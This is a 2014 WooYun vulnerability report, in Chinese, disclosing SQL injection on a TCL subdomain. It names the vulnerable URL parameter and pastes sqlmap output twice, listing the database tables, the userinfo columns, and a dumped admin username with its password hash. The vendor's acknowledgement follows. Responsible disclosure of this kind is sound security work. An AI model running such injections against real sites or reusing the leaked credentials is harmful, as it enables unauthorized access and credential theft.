漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-048088
漏洞标题:TCL某分站sql注射漏洞
相关厂商:TCL集团财务有限公司
漏洞作者: lck丶
提交时间:2014-01-08 12:42
修复时间:2014-02-22 12:42
公开时间:2014-02-22 12:42
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-01-08: 细节已通知厂商并且等待厂商处理中
2014-01-08: 厂商已经确认,细节仅向厂商公开
2014-01-18: 细节向核心白帽子及相关领域专家公开
2014-01-28: 细节向普通白帽子公开
2014-02-07: 细节向实习白帽子公开
2014-02-22: 细节向公众公开
简要描述:
sql注射
详细说明:
http://jingfan.tcl.com/sf/Company.asp?id=1
注射点
[20:52:24] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[20:52:24] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[20:52:24] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[20:52:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:52:25] [INFO] retrieved:
[20:52:25] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:52:25] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[20:52:25] [ERROR] cannot retrieve table names, back-end DBMS is Access
Database: Microsoft_Access_masterdb
[4 tables]
+----------+
| company |
| news |
| products |
| userinfo |
+----------+
Access的一下就跑出来了,之后的事情就很简单了
Database: Microsoft_Access_masterdb
Table: userinfo
[4 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| groupid | numeric |
| id | numeric |
| uname | non-numeric |
| upass | non-numeric |
继续
Database: Microsoft_Access_masterdb
Table: userinfo
[1 entry]
+----+--------------------+-------+-------+------------------+
| id | groupid | npass | uname | upass |
+----+--------------------+-------+-------+------------------+
| 58 | 200511131548585180 | <blank> | star | 49ba59abbe56e057 |
+----+--------------------+-------+-------+------------------+
漏洞证明:
http://jingfan.tcl.com/sf/Company.asp?id=1
注射点
[20:52:24] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[20:52:24] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[20:52:24] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[20:52:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:52:25] [INFO] retrieved:
[20:52:25] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:52:25] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[20:52:25] [ERROR] cannot retrieve table names, back-end DBMS is Access
Database: Microsoft_Access_masterdb
[4 tables]
+----------+
| company |
| news |
| products |
| userinfo |
+----------+
Access的一下就跑出来了,之后的事情就很简单了
Database: Microsoft_Access_masterdb
Table: userinfo
[4 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| groupid | numeric |
| id | numeric |
| uname | non-numeric |
| upass | non-numeric |
继续
Database: Microsoft_Access_masterdb
Table: userinfo
[1 entry]
+----+--------------------+-------+-------+------------------+
| id | groupid | npass | uname | upass |
+----+--------------------+-------+-------+------------------+
| 58 | 200511131548585180 | <blank> | star | 49ba59abbe56e057 |
+----+--------------------+-------+-------+------------------+
时间关系就不跑了,希望给过
修复方案:
漏洞请及时修补,之前我就提交过贵站的漏洞,可是说重复提交。菜鸟挖洞不容易,还有无用的页面尽量关闭,还有这次请不要无视。菜鸟求过,求邀请码啊。
版权声明:转载请注明来源 lck丶@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:7
确认时间:2014-01-08 13:38
厂商回复:
谢谢您的提交,将尽快转发给相关部门
最新状态:
暂无